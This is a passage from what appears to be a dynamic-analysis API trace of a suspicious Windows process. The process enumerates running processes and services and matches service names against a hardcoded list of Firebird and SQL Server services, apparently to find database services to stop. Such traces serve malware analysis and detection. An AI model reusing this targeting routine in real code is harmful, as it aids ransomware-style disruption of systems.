-1 [0287.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0287.630] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0287.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0287.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0287.630] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0287.630] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0287.630] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x560fa8 | out: hHeap=0x470000) returned 1 [0287.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x450 [0287.640] Process32FirstW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.642] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.643] lstrlenW (lpString="System") returned 6 [0287.643] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.643] lstrlenW (lpString="smss.exe") returned 8 [0287.643] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.644] lstrlenW (lpString="csrss.exe") returned 9 [0287.644] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.645] lstrlenW (lpString="wininit.exe") returned 11 [0287.645] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.646] lstrlenW (lpString="csrss.exe") returned 9 [0287.646] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.646] lstrlenW (lpString="winlogon.exe") returned 12 [0287.647] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.648] lstrlenW (lpString="services.exe") returned 12 [0287.648] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.649] lstrlenW (lpString="lsass.exe") returned 9 [0287.649] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0287.649] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0287.649] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0287.650] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0287.650] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.651] lstrlenW (lpString="svchost.exe") returned 11 [0287.651] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.651] lstrlenW (lpString="svchost.exe") returned 11 [0287.651] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.652] lstrlenW (lpString="dwm.exe") returned 7 [0287.653] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.653] lstrlenW (lpString="svchost.exe") returned 11 [0287.653] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.654] lstrlenW (lpString="svchost.exe") returned 11 [0287.654] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.655] lstrlenW (lpString="svchost.exe") returned 11 [0287.655] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.656] lstrlenW (lpString="svchost.exe") returned 11 [0287.656] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.036] lstrlenW (lpString="svchost.exe") returned 11 [0288.036] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.036] lstrlenW (lpString="svchost.exe") returned 11 [0288.036] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.037] lstrlenW (lpString="svchost.exe") returned 11 [0288.037] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.037] lstrlenW (lpString="svchost.exe") returned 11 [0288.037] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.038] lstrlenW (lpString="svchost.exe") returned 11 [0288.038] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.038] lstrlenW (lpString="svchost.exe") returned 11 [0288.038] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.039] lstrlenW (lpString="spoolsv.exe") returned 11 [0288.039] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.040] lstrlenW (lpString="svchost.exe") returned 11 [0288.040] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.043] lstrlenW (lpString="audiodg.exe") returned 11 [0288.043] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0288.043] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0288.043] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0288.044] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0288.044] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0288.044] lstrlenW (lpString="Memory Compression") returned 18 [0288.044] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0288.045] lstrlenW (lpString="taskhostw.exe") returned 13 [0288.045] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0288.047] lstrlenW (lpString="sihost.exe") returned 10 [0288.047] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.048] lstrlenW (lpString="svchost.exe") returned 11 [0288.048] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0288.048] lstrlenW (lpString="MDMAgent.exe") returned 12 [0288.048] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0288.049] lstrlenW (lpString="taskhostw.exe") returned 13 [0288.049] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.049] lstrlenW (lpString="explorer.exe") returned 12 [0288.049] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0288.050] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0288.050] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0288.050] lstrlenW (lpString="SearchUI.exe") returned 12 [0288.050] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0288.051] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0288.051] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.051] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0288.051] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0288.052] lstrlenW (lpString="mobsync.exe") returned 11 [0288.052] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0288.052] lstrlenW (lpString="wdgmug.exe") returned 10 [0288.052] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0288.053] lstrlenW (lpString="cmd.exe") returned 7 [0288.053] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0288.054] lstrlenW (lpString="conhost.exe") returned 11 [0288.054] Process32NextW (in: hSnapshot=0x450, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0288.055] CloseHandle (hObject=0x450) returned 1 [0288.055] Sleep (dwMilliseconds=0x1f4) [0288.903] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013db8 [0288.907] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0288.909] GetLastError () returned 0xea [0288.909] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4022d78 [0288.910] EnumServicesStatusExW (in: hSCManager=0x4013db8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4022d78, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4022d78, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0288.926] CloseServiceHandle (hSCObject=0x4013db8) returned 1 [0288.926] lstrlenW (lpString="AppXSvc") returned 7 [0288.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0288.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0288.927] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0288.927] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0288.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0288.927] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0288.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0288.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0288.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0288.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0288.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0288.928] lstrlenW (lpString="Audiosrv") returned 8 [0288.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0288.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0288.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0288.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0288.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0288.928] lstrlenW (lpString="BFE") returned 3 [0288.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0288.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0288.928] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0288.929] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0288.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0288.929] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0288.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0288.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0288.929] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0288.930] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0288.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0288.930] lstrlenW (lpString="CDPSvc") returned 6 [0288.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0288.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0288.930] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0288.930] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0288.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0288.930] lstrlenW (lpString="ClickToRunSvc") returned 13 [0288.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0288.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0288.931] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0288.931] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0288.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0288.931] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0288.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0288.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0288.931] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0288.931] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0288.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0288.931] lstrlenW (lpString="CryptSvc") returned 8 [0288.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0288.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0288.931] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0288.931] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0288.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0288.932] lstrlenW (lpString="DcomLaunch") returned 10 [0288.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0288.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0288.932] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0288.932] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0288.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0288.932] lstrlenW (lpString="DeviceAssociationService") returned 24 [0288.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0288.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0288.933] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0288.933] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0288.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0288.933] lstrlenW (lpString="Dhcp") returned 4 [0288.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0288.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0288.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0288.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0288.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0288.933] lstrlenW (lpString="Dnscache") returned 8 [0288.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0288.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0288.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0288.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0288.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0288.934] lstrlenW (lpString="DPS") returned 3 [0288.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0288.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0288.934] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0288.934] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0288.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0288.934] lstrlenW (lpString="DusmSvc") returned 7 [0289.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0289.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0289.412] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0289.412] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0289.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0289.412] lstrlenW (lpString="EventLog") returned 8 [0289.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0289.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0289.412] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0289.412] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0289.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0289.412] lstrlenW (lpString="EventSystem") returned 11 [0289.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0289.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0289.413] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0289.413] 